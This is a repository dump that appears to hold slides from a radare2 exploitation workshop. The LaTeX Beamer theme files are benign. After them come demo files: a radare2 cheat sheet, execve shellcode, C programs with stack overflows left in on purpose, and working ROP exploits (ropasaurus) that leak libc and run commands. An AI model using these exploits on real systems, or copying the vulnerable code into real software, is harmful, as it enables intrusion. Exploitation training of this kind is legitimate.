92 | } 93 | \def\maketitle{% 94 | \ifbeamer@inframe 95 | \titlepage 96 | \else 97 | \frame[plain]{\titlepage} 98 | \fi 99 | } 100 | \def\titlepage{% 101 | \usebeamertemplate{title page} 102 | } 103 | \setbeamertemplate{title graphic}{ 104 | \vbox to 0pt { 105 | \vspace*{2em} 106 | \inserttitlegraphic% 107 | }% 108 | \nointerlineskip% 109 | } 110 | \setbeamertemplate{title}{ 111 | \raggedright% 112 | \linespread{1.0}% 113 | \@metropolis@titleformat{\inserttitle}% 114 | \par% 115 | \vspace*{0.5em} 116 | } 117 | \setbeamertemplate{subtitle}{ 118 | \insertsubtitle% 119 | \par% 120 | \vspace*{0.5em} 121 | } 122 | \setbeamertemplate{title separator}{ 123 | \begin{tikzpicture} 124 | \draw[fg] (0, 0) -- (\textwidth, 0); 125 | \end{tikzpicture}% 126 | \par% 127 | } 128 | \setbeamertemplate{author}{ 129 | \vspace*{2em} 130 | \insertauthor% 131 | \par% 132 | \vspace*{0.25em} 133 | } 134 | \setbeamertemplate{date}{ 135 | \insertdate% 136 | \par% 137 | } 138 | \setbeamertemplate{institute}{ 139 | \vspace*{3mm} 140 | \insertinstitute% 141 | \par% 142 | } 143 | \newcommand{\@metropolis@sectionpage@none}{ 144 | \AtBeginSection{ 145 | % intenionally empty 146 | } 147 | } 148 | \defbeamertemplate{section page}{progressbar}{ 149 | \centering 150 | \begin{minipage}{22em} 151 | \usebeamercolor[fg]{section title} 152 | \usebeamerfont{section title} 153 | \insertsectionhead\\[-1ex] 154 | \usebeamertemplate*{progress bar in section page} 155 | \end{minipage} 156 | \par 157 | } 158 | \newcommand{\@metropolis@sectionpage@progressbar}{ 159 | \setbeamertemplate{section page}[progressbar] 160 | \AtBeginSection{ 161 | \ifbeamer@inframe 162 | \sectionpage 163 | \else 164 | \frame[plain,c]{\sectionpage} 165 | \fi 166 | } 167 | } 168 | \newlength{\metropolis@progressonsectionpage} 169 | \setbeamertemplate{progress bar in section page}{ 170 | \setlength{\metropolis@progressonsectionpage}{% 171 | \textwidth * \ratio{\insertframenumber pt}{\inserttotalframenumber pt}% 172 | }% 173 | \begin{tikzpicture} 174 | \draw[bg, fill=bg] (0,0) rectangle (\textwidth, 0.4pt); 175 | \draw[fg, fill=fg] (0,0) rectangle (\metropolis@progressonsectionpage, 0.4pt); 176 | \end{tikzpicture}% 177 | } 178 | \def\inserttotalframenumber{100} 179 | \newlength{\@metropolis@blockskip} 180 | \setbeamertemplate{block begin}{% 181 | \vspace*{1ex} 182 | \begin{beamercolorbox}[% 183 | ht=2.4ex, 184 | dp=1ex, 185 | leftskip=\@metropolis@blockskip, 186 | rightskip=\@metropolis@blockskip]{block title} 187 | \usebeamerfont*{block title}\insertblocktitle% 188 | \end{beamercolorbox}% 189 | \vspace*{-1pt} 190 | \usebeamerfont{block body}% 191 | \begin{beamercolorbox}[% 192 | dp=1ex, 193 | leftskip=\@metropolis@blockskip, 194 | rightskip=\@metropolis@blockskip, 195 | vmode]{block body}% 196 | } 197 | \setbeamertemplate{block end}{% 198 | \end{beamercolorbox} 199 | \vspace*{0.2ex} 200 | } 201 | \setbeamertemplate{block alerted begin}{% 202 | \vspace*{1ex} 203 | \begin{beamercolorbox}[% 204 | ht=2.4ex, 205 | dp=1ex, 206 | leftskip=\@metropolis@blockskip, 207 | rightskip=\@metropolis@blockskip]{block title alerted} 208 | \usebeamerfont*{block title alerted}\insertblocktitle% 209 | \end{beamercolorbox}% 210 | \vspace*{-1pt} 211 | \usebeamerfont{block body alerted}% 212 | \begin{beamercolorbox}[% 213 | dp=1ex, 214 | leftskip=\@metropolis@blockskip, 215 | rightskip=\@metropolis@blockskip, 216 | vmode]{block body}% 217 | } 218 | \setbeamertemplate{block alerted end}{% 219 | \end{beamercolorbox} 220 | \vspace*{0.2ex} 221 | } 222 | \setbeamertemplate{block example begin}{% 223 | \vspace*{1ex} 224 | \begin{beamercolorbox}[% 225 | ht=2.4ex, 226 | dp=1ex, 227 | leftskip=\@metropolis@blockskip, 228 | rightskip=\@metropolis@blockskip]{block title example} 229 | \usebeamerfont*{block title example}\insertblocktitle% 230 | \end{beamercolorbox}% 231 | \vspace*{-1pt} 232 | \usebeamerfont{block body example}% 233 | \begin{beamercolorbox}[% 234 | dp=1ex, 235 | leftskip=\@metropolis@blockskip, 236 | rightskip=\@metropolis@blockskip, 237 | vmode]{block body}% 238 | } 239 | \setbeamertemplate{block example end}{% 240 | \end{beamercolorbox} 241 | \vspace*{0.2ex} 242 | } 243 | \setbeamertemplate{itemize items}{\textbullet} 244 | \setbeamertemplate{caption label separator}{: } 245 | \setbeamertemplate{caption}[numbered] 246 | \setbeamertemplate{footnote}{% 247 | \parindent 0em\noindent% 248 | \raggedright 249 | \usebeamercolor{footnote}\hbox to 0.8em{\hfil\insertfootnotemark}\insertfootnotetext\par% 250 | } 251 | \setlength{\parskip}{0.5em} 252 | \linespread{1.15} 253 | \define@key{beamerframe}{c}[true]{% centered 254 | \beamer@frametopskip=0pt plus 1fill\relax% 255 | \beamer@framebottomskip=0pt plus 1fill\relax% 256 | \beamer@frametopskipautobreak=0pt plus .4\paperheight\relax% 257 | \beamer@framebottomskipautobreak=0pt plus .6\paperheight\relax% 258 | \def\beamer@initfirstlineunskip{}% 259 | } 260 | \@metropolis@inner@setdefaults 261 | \ProcessPgfPackageOptions{/metropolis/inner} 262 | \endinput 263 | %% 264 | %% End of file `beamerinnerthememetropolis.sty'. 265 | -------------------------------------------------------------------------------- /beamerouterthememetropolis.sty: -------------------------------------------------------------------------------- 1 | %% 2 | %% This is file `beamerouterthememetropolis.sty', 3 | %% generated with the docstrip utility. 4 | %% 5 | %% The original source files were: 6 | %% 7 | %% beamerouterthememetropolis.dtx (with options: `package') 8 | %% --------------------------------------------------------------------------- 9 | %% Copyright 2015 Matthias Vogelgesang and the LaTeX community. A full list of 10 | %% contributors can be found at 11 | %% 12 | %% https://github.com/matze/mtheme/graphs/contributors 13 | %% 14 | %% and the original template was based on the HSRM theme by Benjamin Weiss. 15 | %% 16 | %% This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 17 | %% International License (https://creativecommons.org/licenses/by-sa/4.0/). 18 | %% --------------------------------------------------------------------------- 19 | \NeedsTeXFormat{LaTeX2e} 20 | \ProvidesPackage{beamerouterthememetropolis}[2015/06/12 Metropolis outer theme] 21 | \RequirePackage{etoolbox} 22 | \RequirePackage{calc} 23 | \RequirePackage{pgfopts} 24 | \pgfkeys{ 25 | /metropolis/outer/numbering/.cd, 26 | .is choice, 27 | none/.code=\setbeamertemplate{frame numbering}[none], 28 | counter/.code=\setbeamertemplate{frame numbering}[counter], 29 | fraction/.code=\setbeamertemplate{frame numbering}[fraction], 30 | } 31 | \pgfkeys{ 32 | /metropolis/outer/progressbar/.cd, 33 | .is choice, 34 | none/.code={% 35 | \setbeamertemplate{headline}[plain] 36 | \setbeamertemplate{frametitle}[plain] 37 | \setbeamertemplate{footline}[plain] 38 | }, 39 | head/.code={\pgfkeys{/metropolis/outer/progressbar=none} 40 | \addtobeamertemplate{headline}{}{\usebeamertemplate*{progress bar in head/foot}} 41 | }, 42 | frametitle/.code={\pgfkeys{/metropolis/outer/progressbar=none} 43 | \addtobeamertemplate{frametitle}{}{\usebeamertemplate*{progress bar in head/foot}} 44 | }, 45 | foot/.code={\pgfkeys{/metropolis/outer/progressbar=none} 46 | \addtobeamertemplate{footline}{}{\usebeamertemplate*{progress bar in head/foot}} 47 | }, 48 | } 49 | \pgfkeys{ 50 | /metropolis/outer/frametitleformat/.cd, 51 | .is choice, 52 | regular/.code={% 53 | \renewcommand{\@metropolis@frametitleformat}{}% 54 | \renewcommand{\@metropolis@frametitlestrut}{% 55 | \rule{0pt}{\heightof{ABCDEFGHIJKLMNOPQRSTUVWXYZ}} 56 | } 57 | }, 58 | lowercase/.code={% 59 | \renewcommand{\@metropolis@frametitleformat}{\MakeLowercase}% 60 | \renewcommand{\@metropolis@frametitlestrut}{% 61 | \rule{0pt}{\heightof{abcdefghijklmnopqrstuvwxyz}} 62 | } 63 | }, 64 | uppercase/.code={% 65 | \renewcommand{\@metropolis@frametitleformat}{\MakeUppercase}% 66 | \renewcommand{\@metropolis@frametitlestrut}{% 67 | \rule{0pt}{\heightof{ABCDEFGHIJKLMNOPQRSTUVWXYZ}} 68 | } 69 | }, 70 | } 71 | \newcommand{\@metropolis@outer@setdefaults}{ 72 | \pgfkeys{/metropolis/outer/.cd, 73 | numbering=counter, 74 | progressbar=none, 75 | frametitleformat=lowercase, 76 | } 77 | } 78 | \setbeamertemplate{navigation symbols}{} 79 | \defbeamertemplate{frame numbering}{none}{} 80 | \defbeamertemplate{frame numbering}{counter}{\insertframenumber} 81 | \defbeamertemplate{frame numbering}{fraction}{ 82 | \insertframenumber/\inserttotalframenumber 83 | } 84 | \defbeamertemplate{headline}{plain}{} 85 | \defbeamertemplate{footline}{plain}{% 86 | \begin{beamercolorbox}[wd=\textwidth, sep=3ex]{footline}% 87 | \hfill% 88 | \usebeamerfont{page number in head/foot}% 89 | \usebeamertemplate*{frame numbering} 90 | \end{beamercolorbox}% 91 | } 92 | \def\@metropolis@frametitleformat#1{#1} 93 | \patchcmd{\beamer@@frametitle} 94 | {\beamer@ifempty{#2}{}{% 95 | \gdef\insertframetitle{{#2\ifnum\beamer@autobreakcount>0\relax{}\space\usebeamertemplate*{frametitle continuation}\fi}}% 96 | \gdef\beamer@frametitle{#2}% 97 | \gdef\beamer@shortframetitle{#1}% 98 | }} 99 | {\beamer@ifempty{#2}{}{% 100 | \gdef\insertframetitle{{\@metropolis@frametitleformat{#2}\ifnum\beamer@autobreakcount>0\relax{}\space\usebeamertemplate*{frametitle continuation}\fi}}% 101 | \gdef\beamer@frametitle{#2}% 102 | \gdef\beamer@shortframetitle{#1}% 103 | }} 104 | {} 105 | {\PackageError{beamerouterthememetropolis}{Patching frame title failed.}} 106 | \newlength{\@metropolis@frametitlestrut} 107 | \defbeamertemplate{frametitle}{plain}{% 108 | \nointerlineskip% 109 | \begin{beamercolorbox}[% 110 | wd=\paperwidth,% 111 | sep=1.5ex,% 112 | ]{frametitle}% 113 | \@metropolis@frametitlestrut\insertframetitle\@metropolis@frametitlestrut% 114 | \end{beamercolorbox}% 115 | } 116 | \newlength{\metropolis@progressinheadfoot} 117 | \setbeamertemplate{progress bar in head/foot}{ 118 | \nointerlineskip 119 | \setlength{\metropolis@progressinheadfoot}{% 120 | \paperwidth * \ratio{\insertframenumber pt}{\inserttotalframenumber pt}% 121 | }% 122 | \begin{beamercolorbox}[wd=\paperwidth]{progress bar in head/foot} 123 | \begin{tikzpicture} 124 | \draw[bg, fill=bg] (0,0) rectangle (\paperwidth, 0.4pt); 125 | \draw[fg, fill=fg] (0,0) rectangle (\metropolis@progressinheadfoot, 0.4pt); 126 | \end{tikzpicture}% 127 | \end{beamercolorbox} 128 | } 129 | \@metropolis@outer@setdefaults 130 | \ProcessPgfPackageOptions{/metropolis/outer} 131 | \endinput 132 | %% 133 | %% End of file `beamerouterthememetropolis.sty'. 134 | -------------------------------------------------------------------------------- /beamerthemem.sty: -------------------------------------------------------------------------------- 1 | %% 2 | %% This is file `beamerthemem.sty', 3 | %% generated with the docstrip utility. 4 | %% 5 | %% The original source files were: 6 | %% 7 | %% beamerthemem.dtx (with options: `package') 8 | %% --------------------------------------------------------------------------- 9 | %% Copyright 2015 Matthias Vogelgesang and the LaTeX community. A full list of 10 | %% contributors can be found at 11 | %% 12 | %% https://github.com/matze/mtheme/graphs/contributors 13 | %% 14 | %% and the original template was based on the HSRM theme by Benjamin Weiss. 15 | %% 16 | %% This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 17 | %% International License (https://creativecommons.org/licenses/by-sa/4.0/). 18 | %% --------------------------------------------------------------------------- 19 | \NeedsTeXFormat{LaTeX2e} 20 | \ProvidesPackage{beamerthemem}[2015/06/12 Metropolis Beamer theme] 21 | \RequirePackage{etoolbox} 22 | \RequirePackage{pgfopts} 23 | \RequirePackage{ifxetex} 24 | \RequirePackage{ifluatex} 25 | \newcommand{\metroset}[1]{\pgfkeys{/metropolis/.cd,#1}} 26 | \pgfkeys{/metropolis/.cd, 27 | .search also={ 28 | /metropolis/inner, 29 | /metropolis/outer, 30 | /metropolis/color, 31 | }, 32 | block/.code=\pgfkeysalso{ 33 | inner/block=#1, 34 | color/block=#1, 35 | }, 36 | } 37 | \pgfkeys{ 38 | /metropolis/plaintitleformat/.cd, 39 | .is choice, 40 | regular/.code=\renewcommand{\@metropolis@plaintitleformat}{#1}, 41 | lowercase/.code={% 42 | \renewcommand{\@metropolis@plaintitleformat}{\MakeLowercase{#1}} 43 | }, 44 | uppercase/.code={% 45 | \renewcommand{\@metropolis@plaintitleformat}{\MakeUppercase{#1}} 46 | }, 47 | } 48 | \pgfkeys{ 49 | /metropolis/everytitleformat/.code=\pgfkeysalso{ 50 | inner/titleformat=#1, 51 | inner/sectiontitleformat=#1, 52 | outer/frametitleformat=#1, 53 | plaintitleformat=#1, 54 | } 55 | } 56 | \pgfkeys{/metropolis/.cd, 57 | usetitleprogressbar/.code=\pgfkeysalso{outer/progressbar=frametitle}, 58 | noslidenumbers/.code=\pgfkeysalso{outer/numbering=none}, 59 | usetotalslideindicator/.code=\pgfkeysalso{outer/numbering=fraction}, 60 | nosectionslide/.code=\pgfkeysalso{inner/sectionpage=none}, 61 | darkcolors/.code=\pgfkeysalso{color/background=dark}, 62 | blockbg/.code=\pgfkeysalso{color/block=fill, inner/block=fill}, 63 | } 64 | \newcommand{\@metropolis@setdefaults}{ 65 | \pgfkeys{/metropolis/.cd, 66 | plaintitleformat=lowercase, 67 | } 68 | } 69 | \useinnertheme{metropolis} 70 | \useoutertheme{metropolis} 71 | \usecolortheme{metropolis} 72 | \ifboolexpr{bool {xetex} or bool {luatex}}{ 73 | \usefonttheme{metropolis} 74 | }{ 75 | \PackageWarning{beamerthemem}{% 76 | You need to compile with XeLaTeX or LuaLaTeX to use the Fira fonts. 77 | } 78 | } 79 | \AtEndPreamble{% 80 | \@ifpackageloaded{pgfplots}{% 81 | \RequirePackage{pgfplotsthemetol} 82 | }{} 83 | } 84 | \def\@metropolis@plaintitleformat#1{#1} 85 | \newcommand{\plain}[2][]{% 86 | \begingroup 87 | \setbeamercolor{background canvas}{ 88 | use=palette primary, 89 | parent=palette primary 90 | } 91 | \begin{frame}[c]{#1} 92 | \begin{center} 93 | \usebeamercolor[fg]{palette primary} 94 | \usebeamerfont{section title} 95 | \@metropolis@plaintitleformat{#2} 96 | \end{center} 97 | \end{frame} 98 | \endgroup 99 | } 100 | \newcommand{\mreducelistspacing}{\vspace{-\topsep}} 101 | \@metropolis@setdefaults 102 | \ProcessPgfOptions{/metropolis} 103 | \endinput 104 | %% 105 | %% End of file `beamerthemem.sty'. 106 | -------------------------------------------------------------------------------- /ccicons.sty: -------------------------------------------------------------------------------- 1 | %% 2 | %% This is file `ccicons.sty', 3 | %% generated with the docstrip utility. 4 | %% 5 | %% The original source files were: 6 | %% 7 | %% ccicons.dtx (with options: `package') 8 | %% 9 | %% This is a generated file. 10 | %% 11 | %% Copyright (C) 2012 by Michael Ummels 12 | %% 13 | %% This work may be distributed and/or modified under the 14 | %% conditions of the LaTeX Project Public License, either version 1.3c 15 | %% of this license or (at your option) any later version. 16 | %% The latest version of this license is in 17 | %% http://www.latex-project.org/lppl.txt 18 | %% and version 1.3 or later is part of all distributions of LaTeX 19 | %% version 2005/12/01 or later. 20 | %% 21 | %% This work has the LPPL maintenance status `maintained'. 22 | %% 23 | %% The Current Maintainer of this work is Michael Ummels. 24 | %% 25 | %% This work consists of the files ccicons.dtx, ccicons.ins, 26 | %% ccicons.map, ccicons.pfb, ccicons.tfm, ccicons-u.enc and 27 | %% the derived files ccicons.pdf and ccicons.sty. 28 | %% 29 | %% The files ccicons.pfb and ccicons.tfm have been generated from the 30 | %% file cc-icons-svg.zip available from 31 | %% http://mirrors.creativecommons.org/presskit/icons/cc-icons-svg.zip 32 | %% and released by Creative Commons under the Creative Commons Attribution 33 | %% 3.0 Unported License: http://creativecommons.org/licenses/by/3.0/ 34 | %% 35 | \NeedsTeXFormat{LaTeX2e}[1999/12/01] 36 | \ProvidesPackage{ccicons}[2012/05/22 v1.4 LaTeX support for Creative Commons icons] 37 | \RequirePackage{xkeyval} 38 | \define@boolkey{ccicons.sty}[ccicons@]{copyright}[true]{} 39 | \newcommand{\ccicons@scale}{1.0} 40 | \define@key{ccicons.sty}{scale}{\renewcommand\ccicons@scale{#1}} 41 | \ProcessOptionsX 42 | \DeclareFontFamily{U}{ccicons}{} 43 | \DeclareFontShape{U}{ccicons}{m}{n}{ 44 | <-> s * [\ccicons@scale] ccicons 45 | }{} 46 | \newcommand{\ccicons@font}{\usefont{U}{ccicons}{m}{n}} 47 | \newcommand{\ccicons@logo}{\char0} 48 | \newcommand{\ccicons@by}{\char1} 49 | \newcommand{\ccicons@sa}{\char2} 50 | \newcommand{\ccicons@nd}{\char3} 51 | \newcommand{\ccicons@nc}{\char4} 52 | \newcommand{\ccicons@nceu}{\char5} 53 | \newcommand{\ccicons@ncjp}{\char6} 54 | \newcommand{\ccicons@pd}{\char7} 55 | \newcommand{\ccicons@zero}{\char8} 56 | \newcommand{\ccicons@sampling}{\char9} 57 | \newcommand{\ccicons@share}{\char10} 58 | \newcommand{\ccicons@remix}{\char11} 59 | \newcommand{\ccicons@copy}{\char12} 60 | \newcommand{\ccLogo}{{\ccicons@font\ccicons@logo}} 61 | \newcommand{\ccAttribution}{{\ccicons@font\ccicons@by}} 62 | \newcommand{\ccShareAlike}{{\ccicons@font\ccicons@sa}} 63 | \newcommand{\ccNoDerivatives}{{\ccicons@font\ccicons@nd}} 64 | \newcommand{\ccNonCommercial}{{\ccicons@font\ccicons@nc}} 65 | \newcommand{\ccNonCommercialEU}{{\ccicons@font\ccicons@nceu}} 66 | \newcommand{\ccNonCommercialJP}{{\ccicons@font\ccicons@ncjp}} 67 | \newcommand{\ccPublicDomain}{{\ccicons@font\ccicons@pd}} 68 | \newcommand{\ccZero}{{\ccicons@font\ccicons@zero}} 69 | \newcommand{\ccSampling}{{\ccicons@font\ccicons@sampling}} 70 | \newcommand{\ccShare}{{\ccicons@font\ccicons@share}} 71 | \newcommand{\ccRemix}{{\ccicons@font\ccicons@remix}} 72 | \newcommand{\ccCopy}{{\ccicons@font\ccicons@copy}} 73 | \ifccicons@copyright\renewcommand{\textcopyright}{\ccCopy}\fi 74 | \newcommand{\ccby}% 75 | {\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@by}} 76 | \newcommand{\ccbysa}% 77 | {\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@by% 78 | \kern0.1em\ccicons@sa}} 79 | \newcommand{\ccbynd}% 80 | {\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@by% 81 | \kern0.1em\ccicons@nd}} 82 | \newcommand{\ccbync}% 83 | {\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@by% 84 | \kern0.1em\ccicons@nc}} 85 | \newcommand{\ccbynceu}% 86 | {\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@by% 87 | \kern0.1em\ccicons@nceu}} 88 | \newcommand{\ccbyncjp}% 89 | {\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@by% 90 | \kern0.1em\ccicons@ncjp}} 91 | \newcommand{\ccbyncsa}% 92 | {\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@by% 93 | \kern0.1em\ccicons@nc\kern0.1em\ccicons@sa}} 94 | \newcommand{\ccbyncsaeu}% 95 | {\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@by% 96 | \kern0.1em\ccicons@nceu\kern0.1em\ccicons@sa}} 97 | \newcommand{\ccbyncsajp}% 98 | {\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@by% 99 | \kern0.1em\ccicons@ncjp\kern0.1em\ccicons@sa}} 100 | \newcommand{\ccbyncnd}% 101 | {\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@by% 102 | \kern0.1em\ccicons@nc\kern0.1em\ccicons@nd}} 103 | \newcommand{\ccbyncndeu}% 104 | {\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@by% 105 | \kern0.1em\ccicons@nceu\kern0.1em\ccicons@nd}} 106 | \newcommand{\ccbyncndjp}% 107 | {\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@by% 108 | \kern0.1em\ccicons@ncjp\kern0.1em\ccicons@nd}} 109 | \newcommand{\cczero}% 110 | {\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@zero}} 111 | \newcommand{\ccpd}% 112 | {\mbox{\ccicons@font\ccicons@logo\kern0.1em\ccicons@pd}} 113 | %% 114 | %% 115 | %% End of file `ccicons.sty'. 116 | -------------------------------------------------------------------------------- /demos/Exploit/commands.md: -------------------------------------------------------------------------------- 1 | # ragg2 2 | ragg2 -P 300 -r : generate a De Bruijn Pattern of 300 chars 3 | ragg2 -a x86 -b 32 -i exec -z : generate a x86, 32 bits exec shellcode 4 | 5 | # rarun2 6 | r2 -b 32 -d rarun2 program=pwn1 arg1=$(ragg2 -P 300 -r) : runs pwn1 with a De Bruijn Pattern as first argument, inside radare2's debugger, and force 32 bits 7 | r2 -d rarun2 program=/bin/ls stdin=$(python exploit.py) : runs /bin/ls with the output of exploit.py directed to stdin 8 | 9 | # radiff2 10 | radiff2 -a x86 -b32 -C original patched : diff original and patched on x86_32, using graphdiff algorithm 11 | radiff2 -a x86 -b32 original patched : show differences between original and patched on x86_32 12 | 13 | # r2 14 | ## Analysis 15 | aa : analyse all 16 | afl : list all functions 17 | is : show symbols 18 | ## Debugger 19 | dr : show registers 20 | dc : continue 21 | dcu symbol : continue until symbol 22 | dm : display map 23 | ## Print 24 | pxw 8 @ sym.main : print hexdump grouped as word, on 8 bytes at offset sym.main 25 | pdf @ sym.main : print the disassembly of the sym.main function 26 | ## Mitigations 27 | i~pic : check if the binary has position-independent-code 28 | i~nx : check if the binary has non-executable stack 29 | i~canary : check if the binary has canaries 30 | ## Misc 31 | / pouet\x00 : search for the zero-terminated string "pouet" 32 | woO 41424344 : get the index in the De Bruijn Pattern of the given word 33 | /Rl jmp eax,call ebx : find ROP gadgets that match *;jmp eax;*;call ebx*;* 34 | 35 | -------------------------------------------------------------------------------- /demos/Exploit/pwn1/exploit.py: -------------------------------------------------------------------------------- 1 | l = 76 + 4 2 | shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80' 3 | jmp = '\xb3\x83\x04\x08' # call eax 4 | padding = 'A' * (l - len(shellcode) - len(jmp)) 5 | 6 | print shellcode + padding + jmp 7 | -------------------------------------------------------------------------------- /demos/Exploit/pwn1/pwn1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Exploit/pwn1/pwn1 -------------------------------------------------------------------------------- /demos/Exploit/pwn1/pwn1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | char* foo(const char *b) { 5 | char buff[64]; 6 | 7 | return strcpy(buff, b); 8 | } 9 | 10 | int main(int argc, char **argv) { 11 | if (argc > 1) 12 | printf("%p\n", foo(argv[1])); 13 | 14 | return 0; 15 | } 16 | -------------------------------------------------------------------------------- /demos/Exploit/pwn2/exploit.py: -------------------------------------------------------------------------------- 1 | l = 140 2 | system = '\xab\x84\x04\x08' 3 | payload = '\x37\x86\x04\x08' # you 4 | padding = 'C' * l 5 | 6 | print padding + system + 'BBBB' + payload 7 | -------------------------------------------------------------------------------- /demos/Exploit/pwn2/pwn2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Exploit/pwn2/pwn2 -------------------------------------------------------------------------------- /demos/Exploit/pwn2/pwn2.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | void system_(const char* cmd){ 5 | system(cmd); 6 | } 7 | 8 | void greet(char* cmd) { 9 | char buff[128]; 10 | strcpy(buff, cmd); 11 | printf ("Greetings, %s\n", buff); 12 | } 13 | 14 | int main(int argc, char **argv) { 15 | if (argc > 1) 16 | greet (argv[1]); 17 | else 18 | system_ ("/bin/echo 'Greetings, '$(/usr/bin/id -nu)"); 19 | puts("Nice ot meet you"); 20 | 21 | return 0; 22 | } 23 | -------------------------------------------------------------------------------- /demos/Exploit/pwn2/you: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Exploit/pwn2/you -------------------------------------------------------------------------------- /demos/Exploit/ropasaurus/exploit1.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import struct 3 | import time 4 | import sys 5 | 6 | # radare2 exploitation workshop 7 | # Many thanks to crowell for helping me to write this 8 | 9 | 10 | # This function handle endianess. 11 | # Stolen from De Eindbazen 12 | def rop(*args): 13 | return struct.pack('I'*len(args), *args) 14 | 15 | 16 | readplt = 0x804832c 17 | writeplt = 0x804830c 18 | read_got = 0x0804961c 19 | vuln_func = 0x080483F4 20 | write_addr = 0x08049530 # where we're going to write 21 | pop3ret = 0x080484b6 22 | 23 | # vm glibc offsets 24 | read_local = 0xd9d00 25 | system_local = 0x3e2c0 26 | exit_local = 0x310b0 27 | 28 | # local glibc offsets 29 | read_local = 0xdb1b0 30 | system_local = 0x3e770 31 | exit_local = 0x314a0 32 | 33 | cmd = 'id' 34 | if len(sys.argv) == 2: 35 | cmd = sys.argv[1] 36 | 37 | system_offset = read_local - system_local 38 | exit_offset = read_local - exit_local 39 | 40 | #s = socket.create_connection(('192.168.1.148', 2323)) 41 | s = socket.create_connection(('127.0.0.1', 2323)) 42 | 43 | print('[+] Sending stage1 (leak)') 44 | s.send('A'*140 + rop( 45 | writeplt, 46 | pop3ret, 47 | 1, # stdout 48 | read_got, 49 | 4, # sizeof(void*) on x86_32 50 | 51 | # return to the vulnerable function 52 | vuln_func 53 | )) 54 | 55 | 56 | # receive leaked address of read 57 | leaked_got = struct.unpack('I', s.recv(4))[0] 58 | print('[*] GOT at 0x%08x' % leaked_got) 59 | 60 | # compute the address of system using the leaked offset 61 | system = leaked_got - system_offset 62 | print("[*] system(2) at 0x%08x" % system) 63 | 64 | # compute the address of exit using the leaked offset 65 | exit = leaked_got - exit_offset 66 | print("[*] exit(2) at 0x%08x" % exit) 67 | 68 | # second stage ROP payload 69 | print('[+] Sending stage2 (call)') 70 | s.send('A'*140 + rop( 71 | readplt, # read(2) 72 | pop3ret, 73 | 0, # stdin 74 | write_addr, # where to write 75 | 512, 76 | 77 | # call system 78 | system, 79 | exit, 80 | write_addr 81 | )) 82 | 83 | print('[+] sending stage3 (payload)') 84 | s.send(cmd + '\0') 85 | 86 | print('[+] Reading the result') 87 | print s.recv(9999) 88 | s.close() 89 | -------------------------------------------------------------------------------- /demos/Exploit/ropasaurus/exploit2.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import struct 3 | import time 4 | import sys 5 | 6 | # radare2 exploitation workshop 7 | # (losely based on work from Eindbazen and Crowell) 8 | 9 | 10 | def rop(*args): 11 | return struct.pack('I'*len(args), *args) 12 | 13 | 14 | readplt = 0x804832c 15 | writeplt = 0x804830c 16 | read_got = 0x0804961c 17 | vuln_func = 0x080483F4 18 | write_addr = 0x08049524 # where we're going to write 19 | 20 | #gadgets 21 | pop3ret = 0x080484b6 22 | popebpret = 0x080484e8 23 | leaveret = 0x080482ea 24 | 25 | # vm glibc offsets 26 | read_local = 0xd9d00 27 | system_local = 0x3e2c0 28 | 29 | # local glibc offsets 30 | read_local = 0xdb1b0 31 | system_local = 0x3e770 32 | exit_local = 0x314a0 33 | 34 | cmd = 'ls' 35 | if len(sys.argv) == 2: 36 | cmd = sys.argv[1] 37 | 38 | system_offset = read_local - system_local 39 | 40 | #s = socket.create_connection(('192.168.1.148', 2323)) 41 | s = socket.create_connection(('127.0.0.1', 2323)) 42 | 43 | print('[+] Sending stage1 (leak + write payload)') 44 | s.send('A'*140 + rop( 45 | writeplt, 46 | pop3ret, 47 | 1, # stdout 48 | read_got, 49 | 4, # size of a pointer 50 | 51 | readplt, # read(2) 52 | pop3ret, 53 | 0, # stdin 54 | write_addr, # where to write 55 | 512, 56 | 57 | # This may seem convoluted, but it will simply 58 | # jumps to write_addr. This is a classic trick. 59 | popebpret, 60 | write_addr, 61 | leaveret # one byte alias for mov esp, ebp ; pop ebp then ret # Equivalent to a function epilog 62 | )) 63 | 64 | # receive leaked address of read 65 | leaked_got = struct.unpack('I', s.recv(4))[0] 66 | print('[*] GOT at 0x%08x' % leaked_got) 67 | 68 | # calculate address of system using the leaked offset 69 | system = leaked_got - system_offset 70 | print("[*] system(2) at 0x%08x" % system) 71 | 72 | # second stage ROP payload 73 | print('[+] Sending stage2 (call)') 74 | buf = rop( 75 | 0x42424242, # new value of ebp, we don't care 76 | 77 | # call system 78 | system, 79 | 0x43434343, # We don't care 80 | write_addr + 4*4 # 16 because we skip len(stage2) for our stack 81 | ) + cmd + '\0' 82 | 83 | s.send(buf) 84 | 85 | print('[+] Reading the result') 86 | print s.recv(9999) 87 | s.close() 88 | -------------------------------------------------------------------------------- /demos/Exploit/ropasaurus/exploit3.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import struct 3 | import time 4 | import sys 5 | 6 | # radare2 exploitation workshop 7 | # (losely based on work from Eindbazen and Crowell) 8 | 9 | def rop(*args): 10 | return struct.pack('I'*len(args), *args) 11 | 12 | 13 | readplt = 